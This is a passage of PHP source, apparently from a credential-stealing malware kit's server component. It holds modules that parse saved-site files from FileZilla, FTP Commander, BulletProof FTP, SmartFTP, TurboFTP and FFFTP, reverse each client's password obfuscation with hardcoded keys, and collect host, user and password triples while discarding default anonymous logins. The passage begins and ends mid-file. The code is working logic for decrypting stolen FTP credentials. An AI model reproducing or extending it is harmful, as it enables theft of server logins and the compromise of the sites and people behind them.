1909. if ($name == 'Last Server User') $this->last_server['user'] = $this->fix_entities($this->dec_utf8(assign($parent_value)));
1910. if ($name == 'Last Server Pass') $this->last_server['pass'] = $parent_value;
1911.  
1912. $parent_value = assign($xml_array['value']);
1913. foreach ($xml_array as $value)
1914. {
1915. if (is_array($value))
1916. {
1917. $this->read_xml_last_server($value, $parent_value);
1918. }
1919. }
1920. }
1921.  
1922. protected function rec_scan_xml_array($xml_array)
1923. {
1924. foreach ($xml_array as $key=>$value)
1925. {
1926. if (is_array($value))
1927. {
1928. if ((strval($key) == 'Server' || strval($key) == 'LastServer' || strval($key) == 'Site') && is_array($value))
1929. {
1930. $require_decryption = false;
1931.  
1932. if (strval($key) == 'Site')
1933. $require_decryption = true;
1934. if (strval($key) == 'Server' && !$this->is_v3)
1935. $require_decryption = true;
1936.  
1937. $this->read_xml_item($value, $require_decryption);
1938. }
1939. if (strval($key) == 'Settings' && is_array($value))
1940. {
1941. $this->read_xml_last_server($value, '');
1942.  
1943. }
1944. $this->rec_scan_xml_array($value);
1945. }
1946. }
1947. }
1948.  
1949. protected function process_xml($value)
1950. {
1951. $value = trim($value);
1952.  
1953. $this->last_server = array();
1954. $this->is_v3 = strpos($value, '<FileZilla3') !== false;
1955. $this->is_converted = false;
1956.  
1957. if (!strlen($value))
1958. return;
1959.  
1960. // file will be always processed as UTF-8
1961. if (strpos($value, 'UTF-8') === false && strpos($value, 'utf-8') === false)
1962. {
1963. $value = utf8_encode($value);
1964. $value = str_replace('encoding="ISO-8859-1"', 'encoding="UTF-8"', $value);
1965. $this->is_converted = true;
1966. }
1967.  
1968. // fix encoded url entities
1969. $value = str_replace('&#', '_zomgencodedentity_', $value);
1970.  
1971. // fix non-closed tags
1972. if ((strpos($value, '<Settings>') !== false) && (strpos($value, '</Settings>') === false) &&
1973. (strpos($value, '<FileZilla3>') !== false))
1974. {
1975. $value .= "\r\n</Settings></FileZilla3>";
1976. }
1977.  
1978. $xml_parser = new XMLParser($value);
1979.  
1980. $parsed_xml = $xml_parser->parse();
1981. if (!$xml_parser->isError || is_array($parsed_xml))
1982. {
1983. $this->rec_scan_xml_array($parsed_xml);
1984.  
1985. /* Process Last Server stored in older XML files */
1986.  
1987. $host = assign($this->last_server['host']);
1988. $port = assign($this->last_server['port']);
1989. $proto = assign($this->last_server['protocol']);
1990. $dir = assign($this->last_server['dir']);
1991. $user = assign($this->last_server['user']);
1992. $pass = $this->decrypt(assign($this->last_server['pass']));
1993.  
1994. if ($proto == 0x1002)
1995. $proto = 3;
1996.  
1997. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $proto == 3), $port, $dir), $user, $pass);
1998.  
1999. } else
2000. {
2001. $this->log->add("ERR_XML_PARSE");
2002. }
2003. }
2004.  
2005. public function import_item($stream, $id)
2006. {
2007. switch ($id)
2008. {
2009. case 0x0000:
2010. case 0x0001:
2011. case 0x0002:
2012. $this->process_xml($stream->read_str(), $id);
2013. break;
2014. case 0x0003:
2015. case 0x0013:
2016. // port stored as string
2017. $host = $stream->read_str();
2018. $user = $stream->read_str();
2019. $pass = $this->decrypt($stream->read_str());
2020. $port = $stream->read_str();
2021. $dir = $stream->read_str();
2022.  
2023. if (($id & 0x10) > 0)
2024. {
2025. $proto = $stream->read_dword();
2026. if ($proto == 0x1002)
2027. $proto = 3;
2028. }
2029. else
2030. {
2031. $proto = 0;
2032. }
2033.  
2034. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $proto == 3), $port, $dir), $user, $pass);
2035. break;
2036. case 0x0004:
2037. case 0x0014:
2038. // port stored as dword
2039. $host = $stream->read_str();
2040. $user = $stream->read_str();
2041. $pass = $this->decrypt($stream->read_str());
2042. $port = $stream->read_str();
2043. if (strlen($port) == 4)
2044. $port = strval(data_int32($port));
2045. else
2046. $port = '';
2047. $dir = $stream->read_str();
2048.  
2049. if (($id & 0x10) > 0)
2050. {
2051. $proto = $stream->read_dword();
2052. if ($proto == 0x1002)
2053. $proto = 3;
2054. }
2055. else
2056. {
2057. $proto = 0;
2058. }
2059.  
2060. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $proto == 3), $port, $dir), $user, $pass);
2061. break;
2062. default:
2063. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
2064. return false;
2065. }
2066. return true;
2067. }
2068. }
2069.  
2070. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
2071. // FTP Commander
2072.  
2073. class module_ftpcommander extends module
2074. {
2075. protected function decrypt($pass)
2076. {
2077. if (!strlen($pass))
2078. return false;
2079.  
2080. for ($i = 0; $i < strlen($pass); $i++)
2081. $pass[$i] = chr(ord($pass[$i]) ^ 0x19);
2082.  
2083. return $pass;
2084. }
2085.  
2086. protected function process_ini($value)
2087. {
2088. if (!strlen($value))
2089. return;
2090.  
2091. $values = parse_lines($value);
2092. foreach ($values as $line)
2093. {
2094. $parsed_line = explode(';', $line);
2095.  
2096. $host = '';
2097. $user = '';
2098. $pass = '';
2099. $port = '';
2100. $dir = '';
2101. $use_ssh = '';
2102.  
2103. foreach ($parsed_line as $v)
2104. {
2105. $name = substr($v, 0, strpos($v, '='));
2106. $val = substr($v, strpos($v, '=')+1);
2107.  
2108. if (strtolower($name) == 'server')
2109. $host = trim($val);
2110.  
2111. if (strtolower($name) == 'port')
2112. $port = trim($val);
2113.  
2114. if (strtolower($name) == 'user')
2115. $user = trim($val);
2116.  
2117. if (strtolower($name) == 'password')
2118. {
2119. $pass = trim($val);
2120.  
2121. if ($pass == '1' || $pass == '0')
2122. $pass = '';
2123. else
2124. {
2125. $pass = $this->decrypt($pass);
2126. }
2127. }
2128.  
2129. if (strtolower($name) == 'initialdir')
2130. $dir = trim($val);
2131.  
2132. if (strtolower($name) == 'usessh')
2133. $use_ssh = trim($val);
2134. }
2135.  
2136. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $use_ssh == '1'), $port, $dir), $user, $pass);
2137. }
2138. }
2139.  
2140. public function import_item($stream, $id)
2141. {
2142. if ($id != 0x0000)
2143. {
2144. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
2145. return false;
2146. }
2147. $this->process_ini($stream->read_str());
2148. return true;
2149. }
2150. }
2151.  
2152. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
2153. // BulletProof FTP
2154.  
2155. class stream_bulletproof extends stream
2156. {
2157. public function read_bps_string()
2158. {
2159. $result = $this->read_strlen($this->read_byte());
2160. if (!$this->state)
2161. return false;
2162. $seed = strlen($result);
2163. for ($i = 0; $i < strlen($result); $i++)
2164. $result[$i] = chr(ord($result[$i]) ^ myrand(0x100, $seed));
2165. return $result;
2166.  
2167. }
2168. }
2169.  
2170. class module_bulletproof extends module
2171. {
2172. protected function decrypt($pass)
2173. {
2174. if (!strlen($pass) || strlen($pass)%2 != 0)
2175. return false;
2176.  
2177. if (substr($pass, 0, 2) != 'bp')
2178. return false;
2179.  
2180. $pass = substr($pass, 2);
2181. $l = int_divide(strlen($pass), 2);
2182. $seed = $l + 0x3F8A7A;
2183. $result = '';
2184. for ($i = 0; $i < $l; $i++)
2185. {
2186. $c = ord($pass[$i*2]) - 0x61;
2187. $c = ($c << 4) - $c;
2188. $d = ord($pass[$i*2+1]) - 0x61;
2189. $result .= chr((($d + $c) & 0xff) ^ (myrand(0xfa, $seed)));
2190. }
2191.  
2192. return $result;
2193. }
2194.  
2195. protected function process_bps($value)
2196. {
2197. $stream = new stream_bulletproof($value, $this->log);
2198.  
2199. if ($stream->read_bps_string($stream) != 'BPSitelist')
2200. return;
2201.  
2202. $stream->read_skip(4);
2203.  
2204. while ($stream->state && ($stream->pos < $stream->datalen))
2205. {
2206. $stream->read_bps_string(); // itemname
2207. $host = $stream->read_bps_string(); // host
2208. $user = $stream->read_bps_string(); // user
2209. $dir = $stream->read_bps_string(); // remote_dir
2210. $stream->read_bps_string(); // local_dir
2211. $port = $stream->read_bps_string(); // port (string)
2212. $pass = $stream->read_bps_string(); // pass
2213. $stream->read_skip(25);
2214. if ($stream->state)
2215. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
2216. }
2217. }
2218.  
2219. protected function process_dat($value)
2220. {
2221. $values = parse_lines($value);
2222. if (count($values) >= 7)
2223. {
2224. $host = $values[1];
2225. $port = $values[2];
2226. $user = $values[3];
2227. $pass = $this->decrypt($values[4]);
2228. $dir = $values[6];
2229. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
2230. }
2231. }
2232.  
2233. public function import_item($stream, $id)
2234. {
2235. switch ($id)
2236. {
2237. case 0x0000:
2238. $this->process_bps($stream->read_str());
2239. break;
2240. case 0x0001:
2241. $this->process_dat($stream->read_str());
2242. break;
2243. default:
2244. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
2245. return false;
2246. }
2247. return true;
2248. }
2249. }
2250.  
2251. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
2252. // SmartFTP 2.x-4.x
2253.  
2254. class stream_smartftp extends stream
2255. {
2256. public function read_smartstr()
2257. {
2258. if (!$this->state)
2259. return false;
2260. $w = $this->read_word();
2261. $b = $this->read_byte();
2262. if ($w != 0xfeff || $b != 0xff)
2263. {
2264. $this->push_error('ERR_SMARTFTP_STR');
2265. return false;
2266. }
2267. $len = $this->read_byte();
2268. if ($len == 0xff)
2269. $len = $this->read_word();
2270. if (!$this->state)
2271. return false;
2272. return unicode_to_ansi($this->read_strlen($len*2));
2273. }
2274.  
2275. public function read_smartwstr()
2276. {
2277. if (!$this->state)
2278. return false;
2279. return $this->read_strlen($this->read_word());
2280. }
2281. }
2282.  
2283. class module_smartftp extends module
2284. {
2285. protected function decrypt($pass)
2286. {
2287. if ((!strlen($pass)) || ((strlen($pass) % 4) != 0))
2288. return false;
2289.  
2290. $crypt = array(
2291. 0xE722, 0xF62F, 0xB67C, 0xDD5A, 0x0FDB, 0xB94E, 0x5196, 0xE040, 0xF694, 0xABE2, 0x21BB, 0xFC08, 0xE48E, 0xB96A, 0x55D7, 0xA6E5,
2292. 0xA4A1, 0x2172, 0x822D, 0x29EC, 0x57E4, 0x1458, 0x04D1, 0x9DC1, 0x7020, 0xFC6A, 0xED8F, 0xEFBA, 0x8E88, 0xD689, 0xD18E, 0x8740,
2293. 0xA6DE, 0x8E01, 0x3AC2, 0x6871, 0xEE11, 0x8C2A, 0x5FC1, 0x337F, 0x6D32, 0xD471, 0x7DC9, 0x0CD9, 0x5071, 0xA094, 0x1605, 0x6FD7,
2294. 0x3638, 0x4FFD, 0xB3B2, 0x9717, 0xBECA, 0x721C, 0x623F, 0x068F, 0x698F, 0x7FFF, 0xE29C, 0x27E8, 0x7189, 0x4939, 0xDB4E, 0xC3FD,
2295. 0x8F8B, 0xF4EE, 0x9395, 0x6B1A, 0xD1B1, 0x0F6A, 0x4D8B, 0xA696, 0xA79D, 0xBB9E, 0x00DF, 0x093C, 0x856F, 0xB51C, 0xF1C5, 0xE83D,
2296. 0x393A, 0x03D1, 0x68D8, 0x9659, 0xF791, 0xB2C2, 0x0234, 0x9B5C, 0xB1BF, 0x72EB, 0xDABA, 0xF1C5, 0xDA01, 0xF047, 0x3DD8, 0x72AB,
2297. 0xD6DD, 0x6793, 0x898D, 0x7757);
2298.  
2299. $pass = hextostr($pass);
2300.  
2301. if ($pass !== false)
2302. {
2303. $pass = substr($pass, 0, 200); // limit decryption length
2304. for ($i = 0; $i < int_divide(strlen($pass), 2); $i++)
2305. {
2306. $pass[$i*2] = chr(ord($pass[$i*2]) ^ ($crypt[$i] >> 8));
2307. $pass[$i*2+1] = chr(ord($pass[$i*2+1]) ^ ($crypt[$i] & 0xff));
2308. }
2309. return unicode_to_utf8($pass);
2310. } else
2311. {
2312. $this->log->add('ERR_INVALID_HEX_STRING');
2313. return false;
2314. }
2315. }
2316.  
2317. private function read_xml_item($xml_array)
2318. {
2319. $host = assign($xml_array['Host']);
2320. $user = assign($xml_array['User']);
2321. $pass = assign($xml_array['Password']);
2322. $pass = $this->decrypt($pass);
2323. $port = assign($xml_array['Port']);
2324. $dir = assign($xml_array['Path']);
2325.  
2326. $host = Utf8ToWin($host);
2327. $user = Utf8ToWin($user);
2328. $pass = Utf8ToWin($pass);
2329. $dir = Utf8ToWin($dir);
2330.  
2331. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
2332.  
2333. foreach ($xml_array as $value)
2334. {
2335. if (is_array($value))
2336. $this->read_xml_item($value);
2337. }
2338. }
2339.  
2340. private function rec_scan_xml_array($xml_array)
2341. {
2342. foreach ($xml_array as $key=>$value)
2343. {
2344. if (is_array($value))
2345. {
2346. if ((strval($key) == 'FavoriteItem') && is_array($value))
2347. $this->read_xml_item($value);
2348. $this->rec_scan_xml_array($value);
2349. }
2350. }
2351. }
2352.  
2353. protected function process_xml($value)
2354. {
2355. if (!strlen($value))
2356. return;
2357.  
2358. // some XMLs are actually binary files
2359. if (substr($value, 0, 4) == "\x53\x43\x55\x01")
2360. return;
2361.  
2362. $xml_parser = new XMLParser($value);
2363. $parsed_xml = $xml_parser->parse();
2364. if (!$xml_parser->isError || is_array($parsed_xml))
2365. {
2366. $this->rec_scan_xml_array($parsed_xml);
2367. } else
2368. {
2369. $this->log->add("ERR_XML_PARSE");
2370. }
2371. }
2372.  
2373. private function process_fav_item($stream)
2374. {
2375. $type_id = $stream->read_word();
2376. if ($type_id == 0xffff)
2377. {
2378. $stream->read_skip(2);
2379. $ctype = $stream->read_smartwstr();
2380. if (!$stream->state || ($ctype != 'CStorageFolder' && $ctype != 'CFavoritesItem'))
2381. {
2382. $this->log->add('ERR_INVALID_SMARTFTP_TYPE');
2383. return false;
2384. }
2385. }
2386.  
2387. $stream->read_skip(16);
2388. $stream->read_smartstr(); // ItemName
2389. $nSubItems = $stream->read_word();
2390.  
2391. if ($stream->eof())
2392. return true;
2393.  
2394. if ($nSubItems > 0)
2395. {
2396. // folder
2397. while ($nSubItems-- && $stream->state)
2398. {
2399. if (!$this->process_fav_item($stream))
2400. return false;
2401. }
2402. return $stream->state;
2403. }
2404.  
2405. if (!$stream->state)
2406. return false;
2407.  
2408. $ver = $stream->read_dword();
2409.  
2410. $host = $stream->read_smartstr();
2411. $user = $stream->read_smartstr();
2412. $pass = $stream->read_smartstr();
2413.  
2414. if ($ver > 3)
2415. $stream->read_smartstr(); // account
2416.  
2417. if (($ver == 1) || ($ver == 2) || ($ver == 3) || ($ver == 4) || ($ver == 5) || ($ver == 6) || ($ver == 7))
2418. {
2419. $stream->read_skip(4);
2420. if ($ver >= 6)
2421. $stream->read_skip(4);
2422. $port = $stream->read_dword();
2423. $stream->read_skip(4);
2424. $dir = $stream->read_smartstr();
2425. $stream->read_smartstr(); // Decription
2426. $stream->read_skip(16);
2427. $bookmark_count = $stream->read_word();
2428. for ($i = 0; $i < $bookmark_count; $i++)
2429. {
2430. $type_id = $stream->read_word();
2431. if ($type_id == 0xffff)
2432. {
2433. $stream->read_skip(2);
2434. $ctype = $stream->read_smartwstr();
2435. if (!$stream->state || ($ctype != 'CBookmarkItem'))
2436. {
2437. $this->log->add('ERR_INVALID_SMARTFTP_TYPE');
2438. return false;
2439. }
2440. }
2441. $stream->read_smartstr(); // Bookmark1
2442. $stream->read_smartstr(); // Bookmark2
2443. }
2444. $stream->read_skip(4*16-4-8);
2445. if ($ver > 2)
2446. $stream->read_skip(8);
2447. $stream->read_smartstr(); // LocalFolder
2448. $stream->read_skip(4);
2449. $sub_ver = $stream->read_dword();
2450.  
2451. if ($sub_ver == 1)
2452. {
2453. $stream->read_smartstr(); // MapURL1
2454. $stream->read_smartstr(); // MapURl2
2455. $stream->read_skip(4*16-4);
2456. } else
2457. {
2458. $stream->read_skip(4*16-8);
2459. }
2460. if ($ver > 2)
2461. $stream->read_skip(4);
2462. $stream->read_smartstr(); // CertStr
2463. if ($ver > 2)
2464. $stream->read_skip(4);
2465. $stream->read_skip(8);
2466. $stream->read_smartstr(); // ProxyHost
2467. $stream->read_skip(4); // ProxyPort
2468. $stream->read_skip(4); // ProxyType
2469. $stream->read_smartstr(); // ProxyUser
2470. $stream->read_smartstr(); // ProxyPass
2471.  
2472. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
2473.  
2474. $stream->read_skip(80);
2475. // Seek for 0x0180 | 0x0380
2476. while ($stream->state && !$stream->eof())
2477. {
2478. $first_ver_byte = $stream->read_byte();
2479. if (($first_ver_byte == 0x03 || $first_ver_byte == 0x01) && ($stream->read_byte() == 0x80))
2480. {
2481. $stream->pos -= 2;
2482. break;
2483. }
2484. }
2485. } else
2486. {
2487. $this->log->add('ERR_INVALID_SMARTFTP_VERSION: '.$ver);
2488. return false;
2489. }
2490. return $stream->state;
2491. }
2492.  
2493. protected function process_favorites($value)
2494. {
2495. if (strlen($value) < 12)
2496. return false;
2497.  
2498. $header = substr($value, 0, 4);
2499. if ($header != "\x53\x43\x55\x01")
2500. return false;
2501.  
2502. // unpack confing data
2503. $unpacked_data_len = data_int32(substr($value, 4, 4));
2504. $packed_data = substr($value, 12);
2505. $unpacked_data = gzuncompress($packed_data);
2506. if ($unpacked_data !== false && strlen($unpacked_data) == $unpacked_data_len)
2507. {
2508. if (strlen($unpacked_data) > 16)
2509. {
2510. $stream = new stream_smartftp($unpacked_data, $this->log);
2511. $stream->read_skip(20);
2512. $stream->read_smartstr();
2513. $count = $stream->read_word();
2514. while ($stream->state && $count--)
2515. {
2516. if (!$this->process_fav_item($stream))
2517. return false;
2518. }
2519. }
2520. return true;
2521. } else
2522. {
2523. $this->log->add('ERR_CANNOT_UNPACK_SMARTFTP_CONFIG');
2524. return false;
2525. }
2526. }
2527.  
2528. protected function process_history($value)
2529. {
2530. if (!strlen($value))
2531. return false;
2532.  
2533. $header = substr($value, 0, 4);
2534. if ($header != "\x53\x43\x55\x01")
2535. return false;
2536.  
2537. // unpack confing data
2538. $unpacked_data_len = data_int32(substr($value, 4, 4));
2539. $packed_data = substr($value, 12);
2540. $unpacked_data = gzuncompress($packed_data);
2541.  
2542. $ver = 0;
2543.  
2544. if ($unpacked_data !== false && strlen($unpacked_data) == $unpacked_data_len)
2545. {
2546. if (strlen($unpacked_data) > 16)
2547. {
2548. $stream = new stream_smartftp($unpacked_data, $this->log);
2549. $stream->read_skip(4);
2550. $count = $stream->read_word();
2551.  
2552. while ($stream->state && $count--)
2553. {
2554. $type_id = $stream->read_word();
2555. if ($type_id == 0xffff)
2556. {
2557. $ver = $stream->read_word();
2558. $ctype = $stream->read_smartwstr();
2559. if (!$stream->state || ($ctype != 'CHistoryItem'))
2560. {
2561. $this->log->add('ERR_INVALID_SMARTFTP_TYPE');
2562. return false;
2563. }
2564. }
2565.  
2566. $stream->read_skip(32);
2567. if ($stream->eof())
2568. return true;
2569.  
2570. if ($ver >= 5)
2571. $stream->read_skip(4);
2572.  
2573. if ($stream->eof())
2574. return true;
2575.  
2576. if ($ver < 6)
2577. {
2578. $host = $stream->read_smartstr();
2579. $user = $stream->read_smartstr();
2580. $pass = $stream->read_smartstr();
2581. $dir = $stream->read_smartstr();
2582. $port = $stream->read_dword();
2583. $this->add_ftp(append_port_dir($host, $port, $dir), $user, $pass);
2584.  
2585. $stream->read_skip(24-8);
2586. if ($ver >= 5)
2587. $stream->read_skip(8);
2588. $stream->read_smartstr(); // UnkStr1
2589. $stream->read_smartstr(); // UnkStr2
2590. $stream->read_skip(4);
2591. }
2592. }
2593. }
2594. } else
2595. {
2596. $this->log->add('ERR_CANNOT_UNPACK_SMARTFTP_QUICK_CONFIG');
2597. }
2598. return true;
2599. }
2600.  
2601. public function import_item($stream, $id)
2602. {
2603. switch ($id)
2604. {
2605. case 0x0000:
2606. $this->process_xml($stream->read_str());
2607. break;
2608. case 0x0001:
2609. $this->process_favorites($stream->read_str());
2610. break;
2611. case 0x0002:
2612. $this->process_history($stream->read_str());
2613. break;
2614. default:
2615. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
2616. return false;
2617. }
2618. return true;
2619. }
2620. }
2621.  
2622. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
2623. // TurboFTP
2624.  
2625. class stream_turboftp extends stream
2626. {
2627. protected function decrypt($pass)
2628. {
2629. if (!strlen($pass) || !$this->state)
2630. return false;
2631.  
2632. for ($i = 0; $i < strlen($pass); $i++)
2633. $pass[$i] = chr(ord($pass[$i]) ^ 0x49);
2634.  
2635. return $pass;
2636. }
2637.  
2638. public function read_turbostr_unicode()
2639. {
2640. if (!$this->state)
2641. return false;
2642. $l = $this->read_byte();
2643. if ($l == 0xff)
2644. $l = $this->read_word();
2645. if ($l == 0xffff)
2646. $l = $this->read_dword();
2647. return $this->read_strlen($l*2);
2648. }
2649.  
2650. public function read_turbostr($is_pass = false)
2651. {
2652. if (!$this->state)
2653. return false;
2654. $l = $this->read_byte();
2655. if ($l == 0xff)
2656. $l = $this->read_word();
2657. if ($l == 0xfffe)
2658. {
2659. $data = unicode_to_ansi($this->read_turbostr_unicode());
2660. if ($is_pass)
2661. {
2662. return $this->decrypt($data);
2663. }
2664. else
2665. return $data;
2666. }
2667. if ($l == 0xffff)
2668. $l = $this->read_dword();
2669. if ($is_pass)
2670. return $this->decrypt($this->read_strlen($l));
2671. else
2672. return $this->read_strlen($l);
2673.  
2674. }
2675. }
2676.  
2677. class module_turboftp extends module
2678. {
2679. private function read_item($stream, $ver, $is_quick = false)
2680. {
2681. $ver_c = '0';
2682. if (strlen($ver) > 0)
2683. $ver_c = $ver[0];
2684.  
2685. $protocol = 0;
2686.  
2687. $ver_f = intval(substr($ver, 2, 4));
2688.  
2689. if (!$is_quick)
2690. $stream->read_dword(); // Unk
2691. $stream->read_turbostr(); // SiteName
2692. $stream->read_skip(4);
2693. $host = $stream->read_turbostr();
2694. $stream->read_turbostr(); // Decription
2695. $stream->read_skip(4);
2696. $user = $stream->read_turbostr();
2697. $pass = $stream->read_turbostr(true);
2698. $stream->read_skip(4);
2699. $stream->read_turbostr(); // Local folder
2700. $dir = $stream->read_turbostr(); // Remote folder
2701. $stream->read_skip(12);
2702. $port = strval($stream->read_word()); // Port
2703. $stream->read_skip(30);
2704.  
2705. if ($ver_c == '2' && $ver_f <= 72)
2706. {
2707. // do not process
2708. } elseif ($ver_c == '2' && $ver_f <= 81)
2709. {
2710. $stream->read_skip(2);
2711. } else
2712. {
2713. // Remote booksmarks
2714. $bookmark_count = $stream->read_word();
2715. for ($k = 0; $k < $bookmark_count; $k++)
2716. {
2717. $stream->read_turbostr(); // RemoteBookmark Name
2718. $stream->read_turbostr(); // RemoteBookmark Value
2719. }
2720.  
2721. $stream->read_turbostr(); // Account
2722. $stream->read_skip(64);
2723. $stream->read_turbostr(); // Commands
2724. }
2725.  
2726. if ($ver_c >= '3')
2727. {
2728. $stream->read_skip(10);
2729. $protocol = $stream->read_word(); // Connection Protocol (0 - FTP, 4 - SFTP)
2730. $stream->read_skip(8);
2731.  
2732. if ($ver_c == '3' && $ver_f <= 60)
2733. {
2734. } else
2735. {
2736. $stream->read_turbostr(); // Exclude filter
2737. $stream->read_skip(4);
2738.  
2739. $stream->read_turbostr(); // SSL cert
2740. $stream->read_turbostr(); // Private key
2741. $stream->read_turbostr(); // Private pass
2742. if ($ver_c >= '4')
2743. $stream->read_skip(2);
2744. $stream->read_skip(14);
2745. $stream->read_turbostr(); // Include filter
2746. }
2747.  
2748. if ($ver_c >= '5')
2749. {
2750. $stream->read_turbostr();
2751. $stream->read_skip(5*16+8);
2752. $stream->read_turbostr();
2753. $stream->read_turbostr();
2754. $stream->read_skip(4);
2755. $stream->read_turbostr();
2756. $stream->read_turbostr();
2757. $stream->read_skip(20);
2758. $stream->read_turbostr();
2759. $stream->read_turbostr();
2760. $stream->read_turbostr();
2761. $stream->read_turbostr();
2762. $stream->read_turbostr();
2763. if ($ver_c == '6')
2764. {
2765. $bookmark_count = $stream->read_word();
2766. for ($k = 0; $k < $bookmark_count; $k++)
2767. {
2768. // Local bookmarks
2769. $stream->read_turbostr(); // LocalBookmark1
2770. $stream->read_turbostr(); // LocalBookmark2
2771. }
2772. }
2773. } else
2774. $stream->read_turbostr(); // Dial-up connection
2775. }
2776.  
2777. if ($user != 'anonymous' || ($pass != 'TurboFTP@' && $pass != 'TurboFTP@usa.net' && $pass != 'turboftp@')) // filter unwanted default anonymous logins
2778. $this->add_ftp(append_port_dir(ftp_force_ssh($host, $protocol == 4), $port, $dir), $user, $pass);
2779. }
2780.  
2781. private function process_dat($value)
2782. {
2783. if (!strlen($value))
2784. return false;
2785.  
2786. $stream = new stream_turboftp($value, $this->log);
2787. $ver = $stream->read_turbostr();
2788. $n_items = $stream->read_dword();
2789. $stream->read_skip(4);
2790. if (!$stream->state || ($n_items < 0))
2791. {
2792. $this->log->add('ERR_FAILED_TO_PROCESS_TURBOFTP_STREAM');
2793. return false;
2794. }
2795. for ($i = 0; $i < $n_items; $i++)
2796. {
2797. if ($stream->eof())
2798. break;
2799. $this->read_item($stream, $ver);
2800. if (!$stream->state)
2801. {
2802. $this->log->add('ERR_FAILED_TO_PROCESS_TURBOFTP_STREAM');
2803. return false;
2804. }
2805. }
2806. return $stream->state;
2807. }
2808.  
2809. private function process_quick($value)
2810. {
2811. if (!strlen($value))
2812. return false;
2813.  
2814. $stream = new stream_turboftp($value, $this->log);
2815. $ver = (float)$stream->read_dword() / 100;
2816. $ver = number_format($ver, 2, '.', '');
2817. if (!$stream->state)
2818. {
2819. $this->log->add('ERR_FAILED_TO_PROCESS_TURBOFTP_QUICK_STREAM');
2820. return false;
2821. }
2822. while ($stream->state)
2823. {
2824. if ($stream->eof())
2825. break;
2826. $this->read_item($stream, $ver, true);
2827. if (!$stream->state)
2828. {
2829. $this->log->add('ERR_FAILED_TO_PROCESS_TURBOFTP_QUICK_STREAM');
2830. return false;
2831. }
2832. }
2833. return $stream->state;
2834. }
2835.  
2836. public function import_item($stream, $id)
2837. {
2838. switch ($id)
2839. {
2840. case 0x0000:
2841. $this->process_dat($stream->read_str());
2842. break;
2843. case 0x0001:
2844. $this->process_quick($stream->read_str());
2845. break;
2846. default:
2847. $this->log->add("ERR_UNKNOWN_ITEM_TYPE");
2848. return false;
2849. }
2850. return true;
2851. }
2852. }
2853.  
2854. // -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
2855. // FFFTP
2856.  
2857. class module_ffftp extends module
2858. {
2859. protected function check_masterpass($cred_salt, $cred_check, $master_pass = 'DefaultPassword')
2860. {
2861. if (strlen($cred_salt) != 4 || strlen($cred_check) != 41)
2862. return '';
2863.  
2864. $cred_check = substr($cred_check, 0, 40); // remove trailing NULL
2865.  
2866. $hash = sha1($master_pass.chr(0).$cred_salt[3].$cred_salt[2].$cred_salt[1].$cred_salt[0]);
2867.  
2868. $pos = 0;
2869. for ($i = 0; $i < 5; $i++)
2870. {
2871. $sum = 0;
2872. for ($k = 0; $k < 8; $k++)
2873. {
2874. $sum = $sum << 4;
2875. $sum = $sum + ord($cred_check[$pos++]) - 0x40;
2876. }
2877.  
2878. $s = dechex($sum);
2879. while (strlen($s) < 8)
2880. $s = "0".$s;
2881.  
2882. if ($s != substr($hash, $i*8, 8))
2883. return '';
2884. }
2885.  
2886. return $master_pass;
2887. }
2888.  
2889. protected function decrypt_old($pass, $master_pass = '')
2890. {
2891. if (strlen($pass) % 2 != 0 || !strlen($pass))
2892. return '';
2893.  
2894. $i = 0; $k = 0;
2895. $l = strlen($pass);
2896.  
2897. $result = '';
2898. while ($i < $l-1)
2899. {
2900. $eax = ((ord($pass[$i+1]) & 0xf) << 4) | ((ord($pass[$i]) & 0xf) << 8);
2901. $ecx = (ord($pass[$i]) >> 4) & 3;
2902.  
2903. if (ord($pass[$i]) & 1)
2904. $i++;
2905. $i += 2;
2906.  
2907. $ecx = ($eax >> ($ecx+8)) | ($eax >> $ecx);
2908.  
2909. if ($master_pass)
2910. {
2911. $ecx = $ecx ^ ord($master_pass[$k++ % strlen($master_pass)]);
2912. }
2913.  
2914. $ecx = $ecx & 0xff;
2915.  
2916. $result .= chr($ecx);
2917. }
2918. return $result;
2919. }
2920.  
2921. protected function decrypt_new($pass, $master_pass = 'DefaultPassword')
2922. {
2923. $CCryptStr1 = chr(0x3e).chr(0x67).chr(0x5E).chr(0x72).chr(0x3D).chr(0x40).chr(0x4E).chr(0x37).chr(0x3D).chr(0x2F).chr(0x2F).chr(0x7A).chr(0x3C).chr(0x5B).chr(0x60).chr(0x3A);
2924. $CCryptStr2 = chr(0x56).chr(0x47).chr(0x37).chr(0x37).chr(0x64).chr(0x4F).chr(0x31).chr(0x23).chr(0x45).chr(0x79).chr(0x43).chr(0x5D).chr(0x24).chr(0x7C).chr(0x43).chr(0x40);
2925.  
2926. $digest1 = hextostr(sha1($master_pass.$CCryptStr1));
2927. $digest2 = hextostr(sha1($master_pass.$CCryptStr2));
2928.  
2929. $key = '';
2930.  
